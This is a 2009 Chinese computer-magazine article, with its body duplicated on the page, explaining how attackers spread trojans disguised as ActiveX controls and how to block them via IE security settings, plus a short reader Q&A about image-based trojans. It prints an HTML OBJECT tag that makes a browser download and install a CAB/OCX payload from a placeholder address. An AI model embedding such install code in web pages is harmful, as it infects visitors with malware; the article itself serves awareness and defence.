数动连线 > 正文
[2009-06期]ActiveX挂马:以安装的名义入侵(图)
进入论坛讨论 >> 2009-02-15 来源: 数动连线整理
方法2:编写恶意ActiveX木马程序
攻:ActiveX木马程序是利用许多用户会盲从的点击在网页上弹出的ActiveX询问安装按钮的弱点而进行传播的。许多用户往往并不能够分辨出那些ActiveX是无害的,哪些是被伪装成木马病毒的。
特别是这些本身就是木马程序的ActiveX程序为自己装扮上视频聊天、美女图库等诱惑性的幌子之后,那些耐不住寂寞经不起诱惑的用户就会冲动性的点击安装黑客设置在虚假网页中的ActiveX木马程序。
编写自己的ActiveX木马程序,仍然需要一定的编程基础,另外整个过程相当复杂,由于版面的原因,我们这里只向各位预备级安全工程师们简单阐述一下黑客在编写恶意ActiveX时的大致过程,如果有人对编写细节感兴趣,可以去查微软MSDN中的详细资料。
首先黑客会编写一个具有Download或者其它恶意功能的OCX控件,这是恶意ActiveX程序的核心和灵魂,然后黑客会在编写一个Setup安全设置的INF文件,并用CAB压缩工具例如WinCAB将所需的两个文件压缩打包成一个CAB文件。最后黑客就可以将该为你见上传到自己的网站中,并在网页中写入调用安装ActiveX控件的代码即可开张,等待浏览该网页并上钩点击确认安装的受害者(图2)。
调用代码如下:
<OBJECT classid=clsid:68ADAF59-76C1-4561-A45A-867F43545237
codeBase=http://192.168.1.1/web/setup.cab#version=1,0,0,0>
<PARAM NAME="Setup" VALUE="http:// 192.168.1.1/web/download.ocx">
</OBJECT>
当然,这样的ActiveX代码是没有签名验证的,通常在IE的默认设置中不会被允许安装,但是仍然方法可以突破这些安全限制。
防:一般ActiveX挂马网页都是因为加入了用编写的恶意代码才具有破坏力的,这些ActiveX恶意代码就相当于一些小程序,只要打开该网页就会被运行。所以要避免恶意ActiveX的攻击只要禁止这些恶意代码的运行就可以了。
防范此种方式挂马的最好方法还是在客户终端机上操作,在客户终端机运行IE浏览器,点击“工具→Internet选项→安全→自定义级别”,将安全级别定义为“高”,对“ActiveX控件和插件”中第2、3项设置为“禁用”,其它项设置为“提示”,之后点击“确定”(图3)。这样设置后,当你使用IE浏览网页时,就能有效避免恶意网页中恶意代码的攻击。
QQ 少帅:我用的是浏览器是Firefox,能躲过图片挂马的攻击吗?
李海波:图片挂马有两种方式, Firefox能够躲过伪装挂马。但是对于某些由于系统的问题造成的漏洞,例如JPG漏洞等,Firefox是无法避免的。
更多报纸文章请点击新版电子期刊:http://www.icpcw.com/newslist.html
数动连线编辑整理发布
编辑:周俊
攻:ActiveX木马程序是利用许多用户会盲从的点击在网页上弹出的ActiveX询问安装按钮的弱点而进行传播的。许多用户往往并不能够分辨出那些ActiveX是无害的,哪些是被伪装成木马病毒的。
特别是这些本身就是木马程序的ActiveX程序为自己装扮上视频聊天、美女图库等诱惑性的幌子之后,那些耐不住寂寞经不起诱惑的用户就会冲动性的点击安装黑客设置在虚假网页中的ActiveX木马程序。
编写自己的ActiveX木马程序,仍然需要一定的编程基础,另外整个过程相当复杂,由于版面的原因,我们这里只向各位预备级安全工程师们简单阐述一下黑客在编写恶意ActiveX时的大致过程,如果有人对编写细节感兴趣,可以去查微软MSDN中的详细资料。
首先黑客会编写一个具有Download或者其它恶意功能的OCX控件,这是恶意ActiveX程序的核心和灵魂,然后黑客会在编写一个Setup安全设置的INF文件,并用CAB压缩工具例如WinCAB将所需的两个文件压缩打包成一个CAB文件。最后黑客就可以将该为你见上传到自己的网站中,并在网页中写入调用安装ActiveX控件的代码即可开张,等待浏览该网页并上钩点击确认安装的受害者(图2)。
调用代码如下:
<OBJECT classid=clsid:68ADAF59-76C1-4561-A45A-867F43545237
codeBase=http://192.168.1.1/web/setup.cab#version=1,0,0,0>
<PARAM NAME="Setup" VALUE="http:// 192.168.1.1/web/download.ocx">
</OBJECT>
当然,这样的ActiveX代码是没有签名验证的,通常在IE的默认设置中不会被允许安装,但是仍然方法可以突破这些安全限制。
防:一般ActiveX挂马网页都是因为加入了用编写的恶意代码才具有破坏力的,这些ActiveX恶意代码就相当于一些小程序,只要打开该网页就会被运行。所以要避免恶意ActiveX的攻击只要禁止这些恶意代码的运行就可以了。
防范此种方式挂马的最好方法还是在客户终端机上操作,在客户终端机运行IE浏览器,点击“工具→Internet选项→安全→自定义级别”,将安全级别定义为“高”,对“ActiveX控件和插件”中第2、3项设置为“禁用”,其它项设置为“提示”,之后点击“确定”(图3)。这样设置后,当你使用IE浏览网页时,就能有效避免恶意网页中恶意代码的攻击。
上期问题
QQ 少帅:我用的是浏览器是Firefox,能躲过图片挂马的攻击吗?
李海波:图片挂马有两种方式, Firefox能够躲过伪装挂马。但是对于某些由于系统的问题造成的漏洞,例如JPG漏洞等,Firefox是无法避免的。
更多报纸文章请点击新版电子期刊:http://www.icpcw.com/newslist.html
数动连线编辑整理发布
编辑:周俊
()票
()票
已有位SHUDOO网友对本文发表了评论
>> 相关 ActiveX 挂马 新闻:
| 广告 | |||||||||||||||||
|
视觉焦点 | ||||||||||||||||
|
|||||||||||||||||
| IT产品选购区 | |||||||||||||||||
| 应用技巧 | |||||||||||||||||
| |||||||||||||||||
| 广告 |
